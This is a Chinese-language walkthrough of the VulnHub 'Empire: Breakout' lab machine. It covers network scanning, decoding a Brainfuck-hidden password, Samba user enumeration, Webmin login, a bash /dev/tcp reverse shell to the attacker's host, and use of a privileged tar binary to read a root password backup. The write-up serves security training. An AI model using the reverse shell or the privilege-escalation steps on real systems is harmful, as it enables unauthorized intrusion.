vulhub系列-76-02-Breakout(超详细)

张开发
2026/4/21 7:26:18 15 分钟阅读

最新文章

推荐文章

相关文章

分享文章

vulhub系列-76-02-Breakout(超详细)
免责声明本文记录的是 02-Breakout 渗透测试靶机 的解题过程所有操作均在 本地授权环境 中进行。内容仅供 网络安全学习与防护研究 使用请勿用于任何非法用途。读者应遵守《网络安全法》及相关法律法规自觉维护网络空间安全。环境 https://download.vulnhub.com/empire/02-Breakout.zip一、信息收集1、探测目标IP地址arp-scan -l #探测当前网段的所有ip地址┌──(root㉿kali)-[~] └─# arp-scan -l #探测当前网段的所有ip地址 Interface: eth0, type: EN10MB, MAC: 00:0c:29:55:2f:ef, IPv4: 192.168.0.22 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.0.1 00:50:56:c0:00:08 VMware, Inc. 192.168.0.2 00:50:56:e8:e2:84 VMware, Inc. 192.168.0.28 00:0c:29:f5:33:66 VMware, Inc. 192.168.0.254 00:50:56:e3:aa:d9 VMware, Inc. ​ 5 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.959 seconds (130.68 hosts/sec). 4 respondednmap -sP 192.168.0.0/24┌──(root㉿kali)-[~] └─# nmap -sP 192.168.0.0/24 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-24 07:24 -0400 Nmap scan report for 192.168.0.1 Host is up (0.00019s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 192.168.0.2 Host is up (0.00011s latency). MAC Address: 00:50:56:E8:E2:84 (VMware) Nmap scan report for 192.168.0.28 Host is up (0.00013s latency). MAC Address: 00:0C:29:F5:33:66 (VMware) Nmap scan report for 192.168.0.254 Host is up (0.00010s latency). MAC Address: 00:50:56:E3:AA:D9 (VMware) Nmap scan report for 192.168.0.22 Host is up. Nmap done: 256 IP addresses (5 hosts up) scanned in 4.52 seconds目标IP192.168.0.282、探测目标IP开放端口nmap -A -T4 -p 1-65535 192.168.0.28┌──(root㉿kali)-[~] └─# nmap -A -T4 -p 1-65535 192.168.0.28 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-24 07:24 -0400 Nmap scan report for 192.168.0.28 Host is up (0.00028s latency). Not shown: 65530 closed tcp ports (reset) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.51 ((Debian)) |_http-title: Apache2 Debian Default Page: It works |_http-server-header: Apache/2.4.51 (Debian) 139/tcp open netbios-ssn Samba smbd 4 445/tcp open netbios-ssn Samba smbd 4 10000/tcp open http MiniServ 1.981 (Webmin httpd) |_http-server-header: MiniServ/1.981 |_http-title: 200 mdash; Document follows 20000/tcp open http MiniServ 1.830 (Webmin httpd) |_http-title: 200 mdash; Document follows |_http-server-header: MiniServ/1.830 MAC Address: 00:0C:29:F5:33:66 (VMware) Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 1 hop ​ Host script results: | smb2-time: | date: 2026-03-24T11:24:54 |_ start_date: N/A | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required |_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: unknown, NetBIOS MAC: unknown (unknown) ​ TRACEROUTE HOP RTT ADDRESS 1 0.28 ms 192.168.0.28 ​ OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 44.69 seconds ​端口80、139、445、10000、200003、目录探测dirsearch -u http://192.168.0.28┌──(root㉿kali)-[~] └─# dirsearch -u http://192.168.0.28 /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460 Output File: /root/reports/http_192.168.0.28/_26-03-24_07-25-00.txt Target: http://192.168.0.28/ [07:25:00] Starting: [07:25:01] 403 - 277B - /.ht_wsr.txt [07:25:01] 403 - 277B - /.htaccess.bak1 [07:25:01] 403 - 277B - /.htaccess.sample [07:25:01] 403 - 277B - /.htaccess.save [07:25:01] 403 - 277B - /.htaccess_extra [07:25:01] 403 - 277B - /.htaccess.orig [07:25:01] 403 - 277B - /.htaccess_sc [07:25:01] 403 - 277B - /.htaccess_orig [07:25:01] 403 - 277B - /.htaccessOLD2 [07:25:01] 403 - 277B - /.htaccessOLD [07:25:01] 403 - 277B - /.htaccessBAK [07:25:01] 403 - 277B - /.html [07:25:01] 403 - 277B - /.htm [07:25:01] 403 - 277B - /.htpasswd_test [07:25:01] 403 - 277B - /.htpasswds [07:25:01] 403 - 277B - /.httr-oauth [07:25:16] 301 - 313B - /manual - http://192.168.0.28/manual/ [07:25:16] 200 - 208B - /manual/index.html [07:25:21] 403 - 277B - /server-status [07:25:21] 403 - 277B - /server-status/ Task Completed二、漏洞利用1、信息搜集http://192.168.0.28/manual/en/index.htmlhttp://192.168.0.28:20000https://192.168.0.28:20000/查看源码可以发现最下面有一串不知道是什么东西查了一下这是一个Brainfuck编码。[-]...----..-----------.-----------...-.--------..------------.---------...解码后.2uqPEfj3DPa-3这应该是一个密码暂且当密码吧毕竟账号也没有这么奇怪的在nmap扫描端口的时候我们知道了139、445在 samba软件上。使用下列命令扫一下相关信息。enum4linux -a 192.168.0.28 密码.2uqPEfj3DPa-3┌──(root㉿kali)-[~] └─# enum4linux -a 192.168.0.28 Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Mar 24 07:31:29 2026 ( Target Information ) Target ........... 192.168.0.28 RID Range ........ 500-550,1000-1050 Username ......... Password ......... Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ( Enumerating Workgroup/Domain on 192.168.0.28 ) [] Got domain/workgroup name: WORKGROUP ( Nbtstat Information for 192.168.0.28 ) Looking up status of 192.168.0.28 BREAKOUT 00 - B ACTIVE Workstation Service BREAKOUT 03 - B ACTIVE Messenger Service BREAKOUT 20 - B ACTIVE File Server Service ..__MSBROWSE__. 01 - GROUP B ACTIVE Master Browser WORKGROUP 00 - GROUP B ACTIVE Domain/Workgroup Name WORKGROUP 1d - B ACTIVE Master Browser WORKGROUP 1e - GROUP B ACTIVE Browser Service Elections MAC Address 00-00-00-00-00-00 ( Session Check on 192.168.0.28 ) [] Server 192.168.0.28 allows sessions using username , password ( Getting domain SID for 192.168.0.28 ) Domain Name: WORKGROUP Domain Sid: (NULL SID) [] Cant determine if host is part of domain or part of a workgroup ( OS information on 192.168.0.28 ) [E] Cant get OS info with smbclient [] Got OS info for 192.168.0.28 from srvinfo: BREAKOUT Wk Sv PrQ Unx NT SNT Samba 4.13.5-Debian platform_id : 500 os version : 6.1 server type : 0x809a03 ( Users on 192.168.0.28 ) Use of uninitialized value $users in print at ./enum4linux.pl line 972. Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975. Use of uninitialized value $users in print at ./enum4linux.pl line 986. Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988. ( Share Enumeration on 192.168.0.28 ) smbXcli_negprot_smb1_done: No compatible protocol selected by server. Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers IPC$ IPC IPC Service (Samba 4.13.5-Debian) Reconnecting with SMB1 for workgroup listing. Protocol negotiation to server 192.168.0.28 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE Unable to connect with SMB1 -- no workgroup available [] Attempting to map shares on 192.168.0.28 //192.168.0.28/print$ Mapping: DENIED Listing: N/A Writing: N/A [E] Cant understand response: NT_STATUS_OBJECT_NAME_NOT_FOUND listing \* //192.168.0.28/IPC$ Mapping: N/A Listing: N/A Writing: N/A ( Password Policy Information for 192.168.0.28 ) Password: [] Attaching to 192.168.0.28 using a NULL share [] Trying protocol 139/SMB... [] Found domain(s): [] BREAKOUT [] Builtin [] Password Info for Domain: BREAKOUT [] Minimum password length: 5 [] Password history length: None [] Maximum password age: 136 years 37 days 6 hours 21 minutes [] Password Complexity Flags: 000000 [] Domain Refuse Password Change: 0 [] Domain Password Store Cleartext: 0 [] Domain Password Lockout Admins: 0 [] Domain Password No Clear Change: 0 [] Domain Password No Anon Change: 0 [] Domain Password Complex: 0 [] Minimum password age: None [] Reset Account Lockout Counter: 30 minutes [] Locked Account Duration: 30 minutes [] Account Lockout Threshold: None [] Forced Log off Time: 136 years 37 days 6 hours 21 minutes [] Retieved partial password policy with rpcclient: Password Complexity: Disabled Minimum Password Length: 5 ( Groups on 192.168.0.28 ) [] Getting builtin groups: [] Getting builtin group memberships: [] Getting local groups: [] Getting local group memberships: [] Getting domain groups: [] Getting domain group memberships: ( Users on 192.168.0.28 via RID cycling (RIDS: 500-550,1000-1050) ) [I] Found new SID: S-1-22-1 [I] Found new SID: S-1-5-32 [I] Found new SID: S-1-5-32 [I] Found new SID: S-1-5-32 [I] Found new SID: S-1-5-32 [] Enumerating users using SID S-1-5-21-1683874020-4104641535-3793993001 and logon username , password S-1-5-21-1683874020-4104641535-3793993001-501 BREAKOUT\nobody (Local User) S-1-5-21-1683874020-4104641535-3793993001-513 BREAKOUT\None (Domain Group) [] Enumerating users using SID S-1-5-32 and logon username , password S-1-5-32-544 BUILTIN\Administrators (Local Group) S-1-5-32-545 BUILTIN\Users (Local Group) S-1-5-32-546 BUILTIN\Guests (Local Group) S-1-5-32-547 BUILTIN\Power Users (Local Group) S-1-5-32-548 BUILTIN\Account Operators (Local Group) S-1-5-32-549 BUILTIN\Server Operators (Local Group) S-1-5-32-550 BUILTIN\Print Operators (Local Group) [] Enumerating users using SID S-1-22-1 and logon username , password S-1-22-1-1000 Unix User\cyber (Local User) ( Getting printer info for 192.168.0.28 ) No printers returned. enum4linux complete on Tue Mar 24 07:32:09 2026等到一个用户cyber扫到了一个cyber的账户在两个界面尝试20000端口可以登录成功。可以看到一个终端界面进去看看有没有什么命令可以执行cyber/.2uqPEfj3DPa-3登录成功2、反弹shell浏览器终端bash -i /dev/tcp/192.168.0.22/8888 01kalinc -lvnp 8888反弹成功┌──(root?kali)-[~] └─# nc -lvnp 8888 listening on [any] 8888 ... connect to [192.168.0.22] from (UNKNOWN) [192.168.0.28] 36682 bash: cannot set terminal process group (1636): Inappropriate ioctl for device bash: no job control in this shell cyberbreakout:~$三、权限提升1、信息搜集我们去它的备份文件里找找有没有另一个网站的密码。cd /var/backups ls -alcyberbreakout:~$ cd /var/backups cd /var/backups cyberbreakout:/var/backups$ cyberbreakout:/var/backups$ ls -al ls -al total 28 drwxr-xr-x 2 root root 4096 Mar 24 07:29 . drwxr-xr-x 14 root root 4096 Oct 19 2021 .. -rw-r--r-- 1 root root 12732 Oct 19 2021 apt.extended_states.0 -rw------- 1 root root 17 Oct 20 2021 .old_pass.bak cyberbreakout:/var/backups$将备份文件压缩再解压缩后再访问就可以得到密码。cd ~ tar -cf bak.tar /var/backups/.old_pass.bak tar -xf bak.tar cat var/backups/.old_pass.bakcyberbreakout:/var/backups$ cd ~ cd ~ cyberbreakout:~$ ls ls bak.tar tar user.txt cyberbreakout:~$ cyberbreakout:~$ cyberbreakout:~$ ./tar -cf bak.tar /var/backups/.old_pass.bak ./tar -cf bak.tar /var/backups/.old_pass.bak ./tar: Removing leading / from member names cyberbreakout:~$ cyberbreakout:~$ chmod x tar chmod x tar chmod: changing permissions of tar: Operation not permitted cyberbreakout:~$ cyberbreakout:~$ ls -la ls -la total 580 drwxr-xr-x 8 cyber cyber 4096 Mar 24 07:36 . drwxr-xr-x 3 root root 4096 Oct 19 2021 .. -rw-r--r-- 1 cyber cyber 10240 Mar 24 07:39 bak.tar -rw------- 1 cyber cyber 0 Oct 20 2021 .bash_history -rw-r--r-- 1 cyber cyber 220 Oct 19 2021 .bash_logout -rw-r--r-- 1 cyber cyber 3526 Oct 19 2021 .bashrc drwxr-xr-x 2 cyber cyber 4096 Oct 19 2021 .filemin drwx------ 2 cyber cyber 4096 Oct 19 2021 .gnupg drwxr-xr-x 3 cyber cyber 4096 Oct 19 2021 .local -rw-r--r-- 1 cyber cyber 807 Oct 19 2021 .profile drwx------ 2 cyber cyber 4096 Oct 19 2021 .spamassassin -rwxr-xr-x 1 root root 531928 Oct 19 2021 tar drwxr-xr-x 2 cyber cyber 4096 Oct 20 2021 .tmp drwx------ 16 cyber cyber 4096 Oct 19 2021 .usermin -rw-r--r-- 1 cyber cyber 48 Oct 19 2021 user.txt cyberbreakout:~$ cyberbreakout:~$ tar -xf bak.tar tar -xf bak.tar cyberbreakout:~$ cyberbreakout:~$ cat var/backups/.old_pass.bak cat var/backups/.old_pass.bak Ts4YurgtRX(~h cyberbreakout:~$ cyberbreakout:~$得到密码之后在20000端口重新登录root账号即可有root权限的终端root/Ts4YurgtRX(~h[rootbreakout ~]$ ls rOOt.txt [rootbreakout ~]$ cat rOOt.txt 3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation} ​ Author: Icex64 Empire Cybersecurity ​ [rootbreakout ~]$本文涉及的技术方法仅适用于 授权测试环境 或 合法 CTF 赛事。请勿在未授权的情况下对任何系统进行测试。安全之路始于合规终于责任。

更多文章